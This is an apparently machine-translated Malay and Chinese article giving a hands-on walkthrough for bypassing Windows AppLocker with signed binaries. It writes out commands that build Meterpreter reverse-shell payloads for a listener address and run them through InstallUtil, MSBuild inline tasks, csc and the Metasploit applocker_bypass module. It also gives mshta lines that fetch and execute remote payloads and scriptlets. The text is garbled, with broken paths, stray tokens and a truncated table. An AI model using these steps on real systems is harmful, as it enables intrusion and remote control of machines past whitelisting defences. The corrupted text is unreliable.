Rumah >Operasi dan penyelenggaraan >Keselamatan >Cara melakukan analisis pintasan AppLocker
AppLocker, "Dasar Kawalan Aplikasi", ialah ciri keselamatan yang baru ditambah dalam sistem Windows 7. Ciri ini disepadukan secara lalai dalam sistem di atas win7 Kami boleh mendayakan Identiti Aplikasi dalam perkhidmatan, dan kemudian mencari pilihan Applocker dalam Dasar Kawalan Aplikasi dalam dasar keselamatan tempatan.
Peraturan Applocker lalai menyokong jenis berikut:
Peraturan** | Format fail yang berkaitan---|--- fail boleh laku |. exe, .com skrip |. .ps1, .bat, .cmd, .vbs, .js fail Pemasang Windows | 🎜>
.appx tidak wujud dalam semua applocker Ia harus ditentukan mengikut versi windows Pada win10, selepas mencipta peraturan applocker, fail .applocker yang sepadan akan dihasilkan dalam C:WindowsSystem32AppLocker. syarat peraturan applocker<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
InstallUtil ialah sebahagian daripada Rangka Kerja .NET dan merupakan program baris arahan yang membolehkan pengguna memasang dengan pantas melalui gesaan arahan dan nyahpasang aplikasi. Memandangkan utiliti ini ialah binari yang ditandatangani Microsoft, ia boleh digunakan untuk memintas sekatan AppLocker untuk menjalankan mana-mana .NET boleh laku. Utiliti ini juga terletak di dalam folder Windows, yang tidak menggunakan dasar AppLocker kerana kandungan folder Windows perlu dilaksanakan untuk sistem berfungsi dengan baik.
Mula-mula kami menggunakan WhiteListEvasion (https://github.com/khr0x40sh/WhiteListEvasion) untuk menjana templat
<br>
<br>
python InstallUtil.py --cs_file pentestlab.cs --exe_file /root/Desktop/pentestlab.exe --payload windows/meterpreter/reverse_https --lhost 192.168.0.103 --lport 443
Arahan di atas akan menghasilkan templat C# yang akan mengandungi Metasploit ShellCode.
Letakkan fail yang dijana ke dalam sasaran dan laksanakannya menggunakan kaedah berikut:
<br>
<br>
C:WindowsMicrosoft.NETFrameworkv2.0.50727InstallUtil.exe /logfile= /LogToConsole=false /U /root/ payload.exe
Sudah tentu, anda juga boleh menggunakan msf untuk menjana muatan csharp, kemudian menggantikan kod shell dalam templat, dan kemudian memindahkan fail cs ke mesin sasaran.
Kemudian susun skrip kami dengan csc:
<br>
<br>
C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe /out:exeshell.exe exeshell.cs
Pada ketika ini kami cuba melaksanakan fail kami:
dipintas oleh peraturan, kemudian kami menggunakan
<br>
<br>
C:WindowsMicrosoft.NETFrameworkv2 . 0.50727InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
Pintas
msf berjaya dalam talian
Terdapat juga modul pintasan untuk applocker menggunakan InstallUtil.exe dalam msf.
<br>rrree
exploit/windows/local/applocker_bypass
Prinsipnya adalah sama
Dengan laluan biasa:
C:WindowsMicrosoft.NETFrameworkv2.0.50727InstallUtil.exe<br>
C:WindowsMicrosoft.NETFramework64v2.0.50727<br>
C:WindowsMicrosoft.NETFramework64v2.0.50727<br>
exe<br>
MSBuild.exe (Microsoft Build Engine) ialah platform pembinaan perisian yang digunakan oleh Visual Studio. Ia memerlukan fail projek berformat XML yang mentakrifkan keperluan untuk membina untuk pelbagai platform dan konfigurasi. (Petikan: MSDN MSBuild)
Kami boleh menggunakan MSBuild untuk melaksanakan proksi kod melalui utiliti Windows yang dipercayai. Ciri tugas sebaris MSBuild yang diperkenalkan dalam versi .NET 4 membenarkan kod C# untuk dimasukkan ke dalam fail projek XML. Tugasan Sebaris MSBuild akan menyusun dan melaksanakan tugasan sebaris. MSBuild.exe ialah perduaan Microsoft yang ditandatangani, jadi apabila digunakan dengan cara ini, ia boleh melaksanakan kod arbitrari dan memintas perlindungan senarai putih aplikasi yang dikonfigurasikan untuk membenarkan pelaksanaan MSBuild.exe.Kami terus menggunakan GreatSCT untuk menjana fail xml di sini .<br>
<br>./GreatSCT.py --ip 192.168.0.106 --port 4444 -t bypass -p msbuild/meterpreter/rev_tcp.py
dan>
dan kemudian menggunakan msbuild untuk melaksanakannya. :
Sudah tentu anda juga boleh menggunakan msf untuk menjana kod shell c# dan kemudian memuatkannya menggunakan templat master pelajar Sanhao:
https:// github.com/3gstudent/msbuild- inline-task/blob/master/executes%20shellcode.xml
Perhatikan bahawa nama akhiran ditukar kepada .csproj
Selain melantun semula shell, kita juga boleh menggunakannya untuk memintas sekatan powershell.
Kodnya adalah seperti berikut:<br>
<br>
原地址:https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20PowerShellCommands.xml
成功绕过对powershell的限制。
常见路径如下:
C:WindowsMicrosoft.NETFramework02.NETFrame <br>
<br>
<br>C:WindowsMicrosoft.NETFramework64v3.5Msbuild.exe
<br>C:WindowsMicrosoft.NETFrameworkv4.0.30319Msbuild.exe
C:WindowsMicrosoft.NETFramework64v4.0.30319Msbuild.exe<br>
Mshta.exe<br>
<br>
<br>
目标机执行:
<br>
<br>
mshta.exe http://192.168.0.106:8080/JR1gb>可上线。
除了这种方法hta还可以使用cobaltstrike 、Setoolkit、Magic unicorn、Empire、CactusTorch、Koadic蛿版、Koadic、物衭🎜>
除了本地文件,mshta还支持远程下载的方式执行payload,比如:<br>
<br>mshta.exe javascript:a=GetObject("script:https://gist.github.com/someone/something.sct").Exec();close ();除了以上的方式,mshta可以用用来执行powershell:
<br>rrree
Atas ialah kandungan terperinci Cara melakukan analisis pintasan AppLocker. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!